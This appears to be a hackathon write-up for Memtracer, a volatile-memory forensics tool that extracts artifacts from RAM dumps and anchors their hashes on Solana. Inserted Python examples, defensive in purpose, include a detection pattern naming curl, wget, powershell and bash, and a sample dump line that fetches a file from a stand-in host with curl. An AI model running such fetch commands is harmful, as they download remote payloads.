Inspiration

Volatile memory (RAM) often contains some of the most critical forensic evidence, such as credentials, active network connections, running processes, and encryption artifacts, but it is also one of the most fragile and underutilized sources of digital evidence. Once a system is powered down, this information is lost forever, and even after extraction, proving the integrity of memory-derived evidence can be difficult.

We were inspired by the challenges digital forensic investigators face when analyzing memory dumps at scale and maintaining a trustworthy chain of custody. Existing tools can extract artifacts, but they often overwhelm analysts with raw data and lack clear mechanisms to verify that evidence has not been altered after analysis.

Memtracer was built to make volatile memory forensics more accessible, interpretable, and trustworthy by combining automated analysis with verifiable evidence integrity.

What It Does

Memtracer is a digital forensics platform that analyzes RAM dumps to automatically extract and organize investigative artifacts, then anchors those findings on the Solana blockchain to provide a tamper-proof chain of custody.

Memtracer can:

  • Extract and analyze printable strings from memory dumps
  • Detect forensic artifacts such as:
      • URLs and network indicators
      • Email addresses
      • Suspicious command history
      • Running process identifiers
      • Cryptographic indicators (e.g., private key markers, wallet artifacts)
  • Reconstruct an approximate timeline of activity from volatile memory
  • Assign confidence scores to detected artifacts
  • Cryptographically hash forensic findings and record them on Solana for verification

By transforming raw memory data into a structured timeline and verifiable audit trail, Memtracer helps investigators quickly understand what happened on a system and prove that their findings remain unaltered.

How We Built It

Memtracer is built as a modular forensic pipeline with a clear separation between analysis, visualization, and evidence integrity.

Memory Analysis Pipeline

We begin by ingesting a memory dump and extracting printable strings from raw binary data. These strings are analyzed using regex-based detection and heuristic rules to identify forensic artifacts such as URLs, emails, suspicious commands, process names, and cryptographic indicators. Each artifact is tagged with a category and confidence score.

To improve interpretability, detected artifacts are ordered and grouped into an approximate activity timeline, allowing investigators to reason about sequences of events rather than isolated indicators.
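The pipeline described above, as an added example that is not Memtracer's own code: a printable-string extractor, a small regex rule set with base confidence scores, and an offset-ordered timeline. The minimum string length, the rules, the scores and the sample dump are all constructed for this example.

```python
import re
from typing import Dict, List, Tuple

# Constructed threshold and rules for this example; the page does not give Memtracer's own.
MIN_LEN = 6
PRINTABLE = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)

# (category, pattern, base confidence); the base scores are illustrative.
RULES = [
    ("url", re.compile(r"https?://[^\s\"'<>]+"), 0.85),
    ("email", re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+"), 0.80),
    ("command", re.compile(r"\b(?:powershell|cmd\.exe|bash|curl|wget)\b.*"), 0.60),
    ("process", re.compile(r"\b[\w-]+\.exe\b"), 0.50),
    ("crypto_marker", re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"), 0.95),
]

def extract_strings(dump: bytes) -> List[Tuple[int, str]]:
    """Return (offset, text) for every printable-ASCII run of at least MIN_LEN bytes."""
    return [(m.start(), m.group().decode("ascii")) for m in PRINTABLE.finditer(dump)]

def classify(strings: List[Tuple[int, str]]) -> List[Dict]:
    """Tag each string that matches a rule with a category and a confidence score."""
    artifacts = []
    for offset, text in strings:
        for category, pattern, base in RULES:
            for m in pattern.finditer(text):
                # Heuristic: a match that fills the whole string is less likely to be a
                # fragment of unrelated data, so it earns a small bonus (capped at 1.0).
                bonus = 0.10 if m.group() == text.strip() else 0.0
                artifacts.append({
                    "offset": offset + m.start(),
                    "category": category,
                    "value": m.group(),
                    "confidence": round(min(1.0, base + bonus), 2),
                })
    # A raw dump carries no timestamps; offset order stands in as the approximate timeline.
    return sorted(artifacts, key=lambda a: a["offset"])

# Constructed sample dump: binary noise around a few planted artifacts.
SAMPLE_DUMP = (
    b"\x00\x01\xff" * 4
    + b"cmd.exe /c curl http://example.invalid/update.bin\x00"
    + b"\x90" * 8
    + b"alice@example.invalid\x00\x00"
    + b"-----BEGIN RSA PRIVATE KEY-----\x00\x7f\x7f\x7f"
    + b"svchost.exe\x00"
)
```

`classify(extract_strings(SAMPLE_DUMP))` yields six artifacts in offset order: the command line (which also produces a `process` and a `url` hit), the e-mail address, the private-key marker, and the second process name.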

Artifact Integrity & Chain of Custody

Rather than storing sensitive forensic data on-chain, Memtracer hashes each detected artifact using SHA-256 and records the hash along with metadata on the Solana blockchain. This creates an immutable audit log that allows investigators or third parties to verify that forensic findings have not been modified since analysis.

Solana’s fast confirmation times and low transaction costs make it well-suited for logging many small evidence events efficiently.
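The hash-and-verify step described above, as an added example rather than Memtracer's own code: a canonical record is built from the artifact and its metadata, its SHA-256 digest is the value that would be anchored on-chain, and verification recomputes the digest from the off-chain record. The nonce field and the sample values are assumptions added here; the Solana transaction itself is not shown.

```python
import hashlib
import hmac
import json
import os
from typing import Dict, Optional

def canonical_bytes(record: Dict) -> bytes:
    """Serialize deterministically so the same record always produces the same digest."""
    return json.dumps(record, sort_keys=True, separators=(",", ":")).encode("utf-8")

def commit_artifact(artifact: Dict, metadata: Dict, nonce: Optional[bytes] = None) -> Dict:
    """Build the off-chain evidence record and the SHA-256 digest that would be anchored.

    The nonce is an addition not described on the page: a bare SHA-256 of a short
    artifact such as an e-mail address can be confirmed by anyone who guesses the
    value, so a random nonce stored with the off-chain record keeps the public hash
    from revealing it. Writing the digest to Solana is outside this example.
    """
    nonce = os.urandom(16) if nonce is None else nonce
    record = {"artifact": artifact, "metadata": metadata, "nonce": nonce.hex()}
    digest = hashlib.sha256(canonical_bytes(record)).hexdigest()
    return {"record": record, "anchored_hash": digest}

def verify_artifact(record: Dict, anchored_hash: str) -> bool:
    """Recompute the digest from the stored record and compare it with the on-chain value."""
    recomputed = hashlib.sha256(canonical_bytes(record)).hexdigest()
    return hmac.compare_digest(recomputed, anchored_hash)

# Constructed sample: one artifact from the analysis step plus case metadata.
SAMPLE_ARTIFACT = {"offset": 28, "category": "url",
                   "value": "http://example.invalid/update.bin", "confidence": 0.85}
SAMPLE_METADATA = {"case_id": "CASE-EXAMPLE-001",  # placeholder identifier
                   "dump_sha256": hashlib.sha256(b"constructed dump bytes").hexdigest(),
                   "analyzed_at": "2024-01-01T00:00:00Z"}  # placeholder timestamp

def demo() -> Dict[str, bool]:
    """Show that an unmodified record verifies and an altered confidence score does not."""
    entry = commit_artifact(SAMPLE_ARTIFACT, SAMPLE_METADATA, nonce=bytes(16))
    tampered = json.loads(json.dumps(entry["record"]))  # deep copy of the stored record
    tampered["artifact"]["confidence"] = 0.99
    return {"original_ok": verify_artifact(entry["record"], entry["anchored_hash"]),
            "tampered_ok": verify_artifact(tampered, entry["anchored_hash"])}
```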

Frontend Dashboard

The frontend provides a simple interface for uploading memory dumps, exploring extracted artifacts, and visualizing timelines. Investigators can filter artifacts by type and clearly see how volatile memory evidence maps to system activity.

Challenges We Ran Into

  • So many compatibility issues with Python tools that connected to Solana and other related libraries, etc., and so much redownloading, deleting, and version-compatibility checking
  • Solana will only take data through a “map” called an IDL, and the forensic_chain.json file (the “map”) had to be extremely precise

Accomplishments We’re Proud Of

  • Building a working end-to-end memory forensics pipeline within a 36-hour hackathon
  • Automatically transforming raw RAM dumps into structured, readable investigative timelines
  • Designing a blockchain-backed chain of custody that meaningfully improves evidence integrity
  • Integrating Solana in a way that directly supports real-world forensic workflows
  • Delivering a clear, demoable product rather than a purely conceptual tool

What We Learned

We learned a great deal about digital forensics and the unique challenges involved in analyzing volatile memory, which proved to be an extremely valuable experience. Working with raw RAM dumps highlighted how unstructured and noisy memory data can be, and how much careful filtering and contextual analysis are required to extract meaningful forensic artifacts.

From a technical perspective, we gained hands-on experience designing heuristic-based detection systems, reconstructing investigative timelines without explicit timestamps, and balancing accuracy with interpretability. We also learned the importance of presenting forensic results in a clear, human-readable way, as insights are only useful if investigators can quickly understand and trust them.

Integrating Solana taught us how blockchain technology can be applied beyond financial use cases. By using it as a lightweight integrity and provenance layer, we saw how decentralized systems can strengthen trust, auditability, and chain-of-custody guarantees in real-world forensic workflows.

Finally, we learned the value of scope discipline and team coordination in a 36-hour hackathon environment and what is critical to delivering a working, impactful project.

What’s Next for Memtracer

Our long-term vision is for Memtracer to become a trusted platform for volatile memory forensics, helping investigators uncover critical evidence while maintaining transparency, integrity, and trust throughout the investigative process.
